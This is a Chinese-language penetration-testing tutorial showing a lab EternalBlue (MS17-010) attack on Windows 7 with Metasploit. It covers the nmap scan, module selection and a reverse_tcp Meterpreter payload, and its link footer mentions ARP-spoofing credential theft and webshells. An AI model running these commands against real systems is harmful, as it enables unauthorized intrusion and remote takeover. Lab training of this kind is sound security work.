網絡安全與Kali Linux:利用MSF對Win7進行永恆之藍攻防演練實戰

2020-12-23 騰訊網

課前聲明:

1、本分享僅做學習交流,請自覺遵守法律法規!

2、搜索:Kali與編程,學習更多網絡攻防乾貨!

基礎知識介紹:

1.何為永恆之藍?

永恆之藍(Eternal Blue)爆發於2017年4月14日晚,是一種利用Windows系統的SMB協議漏洞來獲取系統的最高權限,以此來控制被入侵的計算機。甚至於2017年5月12日, 不法分子通過改造「永恆之藍」製作了wannacry勒索病毒,使全世界大範圍內遭受了該勒索病毒,甚至波及到學校、大型企業、政府等機構,只能通過支付高額的贖金才能恢復出文件。不過在該病毒出來不久就被微軟通過打補丁修復。

2.什麼是SMB協議?

SMB(全稱是Server Message Block)是一個協議伺服器信息塊,它是一種客戶機/伺服器、請求/響應協議,通過SMB協議可以在計算機間共享文件、印表機、命名管道等資源,電腦上的網上鄰居就是靠SMB實現的;SMB協議工作在應用層和會話層,可以用在TCP/IP協議之上,SMB使用TCP139埠和TCP445埠。

攻擊步驟:

一、確定攻擊目標

1.1 使用kali打開nmap掃描目標主機。

使用nmap執行命令nmap -sS -A 192.168.17.149

-sS(使用SYN掃描),-A(啟用作業系統檢測和版本檢測)。

1.2 根據我們的掃描結果可以大致判斷該系統可能存在永恆之藍漏洞。

二、攻擊步驟

2.1 執行命令:msfconsole打開metasploit。

2.2 執行命令:search ms17_010查詢我們所需要的攻擊模塊。

2.3 找到我們需要的攻擊模塊後執行命令。

use exploit/windows/smb/ms17_010_eternalblue

2.4 執行命令: search payload查找我們需要的payload。

2.5 接下來我們利用該payload。

執行命令:

set payload windows/x64/meterpreter/reverse_tcp。

2.6 執行命令:show options來查看我們所需要設置的參數。

其中RHOSTS(被攻擊計算機IP)和LHOST(自己kali IP)是需要自己設置。

2.7 執行命令:set LHOST 192.168.17.148,set RHOSTS 192.168.17.149即可。

2.8 在設置好一切之後只需要執行命令: exploit即可自動開始攻擊。出現截圖中的顯示就表示已經攻擊成功了。

2.9 我們只需要執行help即可查看我們能夠執行哪些操作。

最後我們執行了meterpreter > screenshot對被攻擊對象進行了屏幕截圖測試。

PS:到此學習完畢,謝謝觀看,獲取更多乾貨請持續關注本號!

辛苦原創,各位看官記得好評加關注哦!你也可搜索:Kali與編程,學習更多Kali Linux滲透與白帽編程技巧哦!

相關焦點

  • 網絡安全與Kali Linux:Kali滲透測試與FTP密碼安全實戰技巧
    搜索:Kali與編程,學習更多網絡攻防乾貨!一、課前介紹在網絡的世界中,有著許多關於信息安全的隱患,其中有一種,是由於用戶個人所設置的密碼過於簡單而產生的,這類密碼被稱之為弱口令,黑客可以通過暴力破解弱口令,獲取用戶登錄個人帳號的密碼,通常這類情況的發生的一個重要原因便是人們的密碼安全意識過低,本次教程將會告訴你設置一個複雜強壯安全的密碼有多麼的重要。
  • 網絡安全工程師教你:如何使用Kali Linux進行滲透測試與攻防實戰
    搜索:Kali與編程,學習更多網絡攻防乾貨!一、背景介紹在我們日常使用Kali Linux時,我們通常在進行模擬攻防演練的時候,我們如何拿下目標主機最高權限呢(例如利用病毒拿下Win7主機),怎樣在受害者主機進行隨意操作呢?如何進行文件下載以及文件上傳呢?如何解決上述問題呢?
  • Metasploit利用永恆之藍ms17-010漏洞入侵win7過程
    晚上在看頭條的時候,看到了一篇用ms17-010永恆之藍漏洞來證明qq瀏覽器和360瀏覽器誰的防禦能力更強的視頻,於是想著自己也來動手試一試,整體來說來metasploit上手非常快,操作步驟也不是很多,熟悉的話就很快的熟能生巧了。
  • 如何開展一場網絡安全實戰攻防演練?
    那麼,如何搞一場安全、高效的網絡安全實戰攻防演練?不要慌,你可能需要這一份由安恆信息打造的《2020網絡安全實戰攻防演練應對指南》(以下簡稱「應對指南」)。什麼是網絡安全實戰攻防演練?網絡安全實戰攻防演練是以獲取指定目標系統(標靶系統)的管理權限為目標的攻防演練,由攻防領域經驗豐富的紅隊專家組成攻擊隊,在保障業務系統穩定運行的前提下,採用「不限攻擊路徑,不限制攻擊手段」的貼合實戰方式,而形成的「有組織」的網絡攻擊行動。
  • 網絡安全與Kali Linux滲透:內網與區域網攻防實戰技巧
    搜索:Kali與編程,學習更多網絡攻防乾貨!下篇文章將在明天下午五點發布,敬請關注!至此,就已經開啟了ip轉發,此時再進行ARP欺騙,受害者計算機將不會斷網,我們才能獲取到受害者電腦的相關帳號密碼。二、竊取受害機相關帳號密碼首先依舊是對目標計算機進行ARP欺騙,當受害者計算機在某網站輸入帳號密碼時,我們kali計算機中就能夠獲取到對應的信息,這裡已依舊是利用ARP欺騙的原理,在ARP欺騙概述那一節中已經講得十分清楚,不明白的小夥伴可以回過頭去看看,再繼續學習,這裡假設已經知道了受害機的ip地址,直接在kali終端中輸入
  • 一文帶你網絡安全 入門到入* [網絡安全]
    實驗三:高安全模式,上傳一句話圖片木馬(文件後綴名限制)上傳一句話木馬圖片(結合下面的 webshell 進行操作)用工具 edjpgcom 給圖片寫入木馬,執行圖片內容生成木馬,用中國菜刀連接進行後臺操作
  • 網絡安全工程師教你:如何使用Kali Linux進行Metasploit滲透攻防
    搜索:Kali與編程,學習更多網絡攻防乾貨!下篇文章將在明天下午五點更新,敬請關注!一、背景介紹Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework,簡稱叫做MSF。
  • kali linux在它面前頓然失色
    對計算機安全和網絡安全感興趣的網友來說,擁有一套自己熟悉、稱手好用的安全工具很重要,不少人在攻防實踐過程中收藏整理了很多工具,這些工具有的歷久彌堅,有的則需要不斷更新甚至是更換。一些人傾向於選擇kali linux,利用它集成的眾多安全軟體,但對於有一定實戰戰經驗的人來說,一定有個性化定製需要,此時,kali linux必然無法滿足這種需要,選擇black archlinux會方便很多。
  • 網絡安全攻防演練「七劍四式」現身西湖論劍
    原標題:網絡安全攻防演練「七劍四式」現身西湖論劍6月16日,以「數治安全 智理未來」為主題的2020西湖論劍·網絡安全線上峰會(以下簡稱「峰會」)成功舉辦。「實戰化防護七劍四式」在峰會上發布,其網絡攻防演練技術體系對外展示。
  • 國網天津電科院:網絡安全紅隊實戰攻防演練再創佳績
    5月12日,國網天津電科院網絡安全紅隊圓滿完成網絡安全實戰攻防演練任務,通過信息安全漏洞隱患挖掘工作,為天津電力網絡安全重大保障奠定基礎。  近年來,網絡安全形勢複雜嚴峻,網絡安全工作已成為電網企業安全生產工作的重要組成部分。為發現內部網絡安全漏洞,鍛鍊紅藍隊攻防對抗能力,電科院技術人員代表天津電力網絡安全紅隊進行網絡安全實戰攻防演練。
  • 網絡安全攻防演練
    To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video     近日,市委網信辦舉辦全市網絡安全實戰型攻防演練
  • 網絡安全工程師教你:Kali Linux滲透與FTP伺服器攻防實戰
    2、搜索:Kali與編程,學習更多網絡攻防乾貨!3、Kali與編程每天準時更新,敬請學習和關注!3.1 運行ftp_version 漏洞利用框架,如下圖所示。命令:back3.3 檢索Metasploit(msf)框架對於ftp_login的漏洞模塊,如下圖所示。
  • 遼寧省開展教育系統網絡安全攻防演練
    11月18日至22日省教育廳開展了為期5天的教育系統網絡安全攻防演練。本次演練行動由遼寧省教育廳組織開展,攻防演練利用實戰平臺,對教育系統關鍵基礎設施進行全方位檢驗。按照教育廳制定的全省教育系統2020年網絡攻防應急演練方案,由網絡攻防應急演練指揮部組織省內7個攻擊隊、32個防守單位進行演練,既檢驗參演單位的安全攻防對抗能力、防禦能力,也檢驗參演單位的安全應急響應和應急處置能力。截至目前,結合演練共發現省內教育系統內各級各類安全隱患及漏洞228個,及時上報教育部網絡安全管理平臺並完成處置,取得了良好的攻防演練效果。
  • 青島市教育局組織開展網絡安全實戰攻防演練活動
    「沒有網絡安全,就沒有國家安全」,市教育局高度重視網絡安全工作,積極貫徹落實習近平總書記關於網絡安全的重要講話精神,以及中央、省、市關於網絡安全的決策部署,嚴格落實《網絡安全法》相關要求,全面持續加強教育系統網絡安全。
  • 2020國家級實戰攻防演練,騰訊安全成為演練標兵
    2020國家級重大紅藍對抗實戰攻防演練中,騰訊安全取得了0事件通報、0失分、溯源反制加分超5000分的優異成績,成為攻防演練標兵。 每年一次的國家級實戰攻防演練,基於真實網絡目標為對象進行實戰攻防,以檢驗國家關鍵信息基礎設施安全防護能力,提升安全事件應急處置綜合能力水平。
  • 從實戰演練看攻防對抗思維的轉變
    以攻促防:實戰攻防演練推動攻防進步自2016年《網絡安全法》頒布以來,網絡安全實戰攻防演練專項行動已成為一年一度的慣例,同時所涉及的單位和規模持續擴大。說一百遍不如打一遍,攻防實戰演練已成為檢驗參演單位網絡安全綜合防禦水平的「試金石」和提升網絡攻擊應對能力的「磨刀石」。
  • 安全學習資料包指北
    htmlPHP 安全新聞早 8 點課程系列高持續滲透--Micropororhttps://github.com/Micropoor/Micro8Microporor 高級攻防 100 課https://github.com/maskhed/Papers包含 100 課等經典攻防教材、安全知識https://github.com/infosecn1nja/AD-Attack-Defense
  • Kali Linux 2019.3 發布,OnePlus 7 成為 NetHunter 推薦設備
    Kali 前身 BackTrack,它是一個基於 Debian 的 Linux 發行版,主要用於信息安全行業,其包含了一系列安全、滲透測試和取證工具。以系統本身為例,在此前版本,kali-linux-full 是默認的元數據包,現在已經重命名為 kali-linux-large 並且重定向,現在還引入了一個名為 kali-linux-default 的新默認元數據包,它可以作為 kali-linux-large 工具的精簡版本。
  • 「2020年菏澤網絡安全攻防演練」正式啟動
    「2020年菏澤網絡安全攻防演練」正式啟動 2020-10-20 17:52 來源:澎湃新聞·澎湃號·政務